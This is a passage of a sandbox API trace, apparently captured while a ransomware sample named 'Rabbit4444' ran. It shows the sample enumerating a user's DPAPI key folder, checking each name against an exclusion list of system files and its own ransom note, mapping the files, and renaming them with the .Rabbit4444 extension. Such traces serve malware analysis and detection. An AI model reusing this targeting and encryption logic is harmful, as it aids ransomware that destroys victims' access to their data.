lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.659] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14396927336) returned 1 [0052.659] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=468) returned 1 [0052.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0052.659] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0052.659] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x298 [0052.660] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x70000 [0052.661] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.661] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0052.661] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.661] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0052.661] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0052.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0052.662] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14397243219) returned 1 [0052.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0052.662] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0052.662] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.662] CloseHandle (hObject=0x298) returned 1 [0052.662] CloseHandle (hObject=0x278) returned 1 [0052.662] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1.Rabbit4444") returned 143 [0052.662] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\5c4d6ef6-b3c3-469c-83d7-eb4debf6bfd1.rabbit4444"), dwFlags=0x1) returned 1 [0052.663] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3a6118fa, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a6118fa, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x2bb4ea93, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7a70842e-d6a2-46c1-966c-384a4ef9d347", cAlternateFileName="7A7084~1")) returned 1 [0052.663] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.663] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.663] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="Rabbit4444.exe") returned -1 [0052.663] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2=".") returned 1 [0052.663] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="..") returned 1 [0052.663] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="windows") returned -1 [0052.663] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="bootmgr") returned -1 [0052.663] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="pagefile.sys") returned -1 [0052.663] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="boot") returned -1 [0052.663] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="ids.txt") returned -1 [0052.663] lstrcmpiW (lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347", lpString2="NTUSER.DAT") returned -1 [0052.663] lstrcpyW (in: lpString1=0x130ebf8, lpString2="7a70842e-d6a2-46c1-966c-384a4ef9d347" | out: lpString1="7a70842e-d6a2-46c1-966c-384a4ef9d347") returned="7a70842e-d6a2-46c1-966c-384a4ef9d347" [0052.663] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347", dwFileAttributes=0x22) returned 1 [0052.664] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347", dwFileAttributes=0x6) returned 1 [0052.664] lstrlenW (lpString="7a70842e-d6a2-46c1-966c-384a4ef9d347") returned 36 [0052.664] lstrlenW (lpString="Rabbit4444") returned 10 [0052.664] lstrcmpiW (lpString1="4a4ef9d347", lpString2="Rabbit4444") returned -1 [0052.664] lstrlenW (lpString=".dll") returned 4 [0052.664] lstrcmpiW (lpString1="d347", lpString2=".dll") returned 1 [0052.664] lstrlenW (lpString=".lnk") returned 4 [0052.664] lstrcmpiW (lpString1="d347", lpString2=".lnk") returned 1 [0052.664] lstrlenW (lpString=".ini") returned 4 [0052.664] lstrcmpiW (lpString1="d347", lpString2=".ini") returned 1 [0052.664] lstrlenW (lpString=".sys") returned 4 [0052.664] lstrcmpiW (lpString1="d347", lpString2=".sys") returned 1 [0052.664] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.664] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.664] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14397507936) returned 1 [0052.664] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=468) returned 1 [0052.664] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0052.664] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0052.664] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x298 [0052.666] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x70000 [0052.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0052.666] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.666] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0052.667] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0052.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0052.667] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14397763366) returned 1 [0052.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0052.667] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0052.667] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.667] CloseHandle (hObject=0x298) returned 1 [0052.667] CloseHandle (hObject=0x278) returned 1 [0052.667] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347.Rabbit4444") returned 143 [0052.667] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\7a70842e-d6a2-46c1-966c-384a4ef9d347.rabbit4444"), dwFlags=0x1) returned 1 [0052.668] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5c020c86, ftCreationTime.dwHighDateTime=0x1d4d5d3, ftLastAccessTime.dwLowDateTime=0x5c020c86, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0x5c0df81b, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", cAlternateFileName="B1334A~1")) returned 1 [0052.668] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.668] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.668] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="Rabbit4444.exe") returned -1 [0052.668] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2=".") returned 1 [0052.668] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="..") returned 1 [0052.668] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="windows") returned -1 [0052.668] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="bootmgr") returned -1 [0052.668] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="pagefile.sys") returned -1 [0052.668] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="boot") returned -1 [0052.668] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="ids.txt") returned -1 [0052.668] lstrcmpiW (lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", lpString2="NTUSER.DAT") returned -1 [0052.668] lstrcpyW (in: lpString1=0x130ebf8, lpString2="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f" | out: lpString1="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f") returned="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f" [0052.668] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", dwFileAttributes=0x22) returned 1 [0052.669] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f", dwFileAttributes=0x6) returned 1 [0052.669] lstrlenW (lpString="b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f") returned 36 [0052.669] lstrlenW (lpString="Rabbit4444") returned 10 [0052.669] lstrcmpiW (lpString1="b6e1e6ed9f", lpString2="Rabbit4444") returned -1 [0052.669] lstrlenW (lpString=".dll") returned 4 [0052.669] lstrcmpiW (lpString1="ed9f", lpString2=".dll") returned 1 [0052.669] lstrlenW (lpString=".lnk") returned 4 [0052.669] lstrcmpiW (lpString1="ed9f", lpString2=".lnk") returned 1 [0052.669] lstrlenW (lpString=".ini") returned 4 [0052.669] lstrcmpiW (lpString1="ed9f", lpString2=".ini") returned 1 [0052.669] lstrlenW (lpString=".sys") returned 4 [0052.669] lstrcmpiW (lpString1="ed9f", lpString2=".sys") returned 1 [0052.669] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.670] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.670] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14398035133) returned 1 [0052.670] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=468) returned 1 [0052.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0052.670] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0052.670] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x298 [0052.700] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x70000 [0052.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0052.700] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.700] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0052.701] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0052.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0052.701] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14401163131) returned 1 [0052.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0052.701] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0052.701] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.705] CloseHandle (hObject=0x298) returned 1 [0052.705] CloseHandle (hObject=0x278) returned 1 [0052.705] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f.Rabbit4444") returned 143 [0052.705] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\b1334ab7-7773-4cde-b00c-b3b6e1e6ed9f.rabbit4444"), dwFlags=0x1) returned 1 [0052.706] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1383bcc, ftCreationTime.dwHighDateTime=0x1d41dc4, ftLastAccessTime.dwLowDateTime=0x1383bcc, ftLastAccessTime.dwHighDateTime=0x1d41dc4, ftLastWriteTime.dwLowDateTime=0x2bbe719f, ftLastWriteTime.dwHighDateTime=0x1d4d5d0, nFileSizeHigh=0x0, nFileSizeLow=0x1d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ddbd6a25-732f-4175-9949-5cdf51e0bd09", cAlternateFileName="DDBD6A~1")) returned 1 [0052.706] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.706] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.706] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="Rabbit4444.exe") returned -1 [0052.706] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2=".") returned 1 [0052.706] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="..") returned 1 [0052.706] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="windows") returned -1 [0052.706] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="bootmgr") returned 1 [0052.706] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="pagefile.sys") returned -1 [0052.706] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="boot") returned 1 [0052.706] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="ids.txt") returned -1 [0052.706] lstrcmpiW (lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09", lpString2="NTUSER.DAT") returned -1 [0052.706] lstrcpyW (in: lpString1=0x130ebf8, lpString2="ddbd6a25-732f-4175-9949-5cdf51e0bd09" | out: lpString1="ddbd6a25-732f-4175-9949-5cdf51e0bd09") returned="ddbd6a25-732f-4175-9949-5cdf51e0bd09" [0052.706] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09", dwFileAttributes=0x22) returned 1 [0052.707] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09", dwFileAttributes=0x6) returned 1 [0052.707] lstrlenW (lpString="ddbd6a25-732f-4175-9949-5cdf51e0bd09") returned 36 [0052.707] lstrlenW (lpString="Rabbit4444") returned 10 [0052.707] lstrcmpiW (lpString1="df51e0bd09", lpString2="Rabbit4444") returned -1 [0052.707] lstrlenW (lpString=".dll") returned 4 [0052.707] lstrcmpiW (lpString1="bd09", lpString2=".dll") returned 1 [0052.707] lstrlenW (lpString=".lnk") returned 4 [0052.708] lstrcmpiW (lpString1="bd09", lpString2=".lnk") returned 1 [0052.708] lstrlenW (lpString=".ini") returned 4 [0052.708] lstrcmpiW (lpString1="bd09", lpString2=".ini") returned 1 [0052.708] lstrlenW (lpString=".sys") returned 4 [0052.708] lstrcmpiW (lpString1="bd09", lpString2=".sys") returned 1 [0052.708] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.708] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.708] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14401859549) returned 1 [0052.708] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=468) returned 1 [0052.708] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0052.708] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0052.708] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x298 [0052.709] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x70000 [0052.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0052.710] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0052.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.711] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0052.711] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.711] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0052.711] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14402148044) returned 1 [0052.711] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0052.711] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0052.711] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.711] CloseHandle (hObject=0x298) returned 1 [0052.711] CloseHandle (hObject=0x278) returned 1 [0052.711] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09.Rabbit4444") returned 143 [0052.711] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-1051304884-625712362-2192934891-1000\\ddbd6a25-732f-4175-9949-5cdf51e0bd09.rabbit4444"), dwFlags=0x1) returned 1 [0052.712] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3a637b3f, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x3a637b3f, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x5c178632, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0052.712] lstrcmpiW (lpString1="Preferred", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.712] lstrcmpiW (lpString1="Preferred", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.712] lstrcmpiW (lpString1="Preferred", lpString2="Rabbit4444.exe") returned -1 [0052.712] lstrcmpiW (lpString1="Preferred", lpString2=".") returned 1 [0052.712] lstrcmpiW (lpString1="Preferred", lpString2="..") returned 1 [0052.712] lstrcmpiW (lpString1="Preferred", lpString2="windows") returned -1 [0052.712] lstrcmpiW (lpString1="Preferred", lpString2="bootmgr") returned 1 [0052.712] lstrcmpiW (lpString1="Preferred", lpString2="pagefile.sys") returned 1 [0052.712] lstrcmpiW (lpString1="Preferred", lpString2="boot") returned 1 [0052.712] lstrcmpiW (lpString1="Preferred", lpString2="ids.txt") returned 1 [0052.712] lstrcmpiW (lpString1="Preferred", lpString2="NTUSER.DAT") returned 1 [0052.712] lstrcpyW (in: lpString1=0x130ebf8, lpString2="Preferred" | out: lpString1="Preferred") returned="Preferred" [0052.712] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-1051304884-625712362-2192934891-1000\\Preferred", dwFileAttributes=0x22) returned 1 [0052.712] SetFileAttributesW 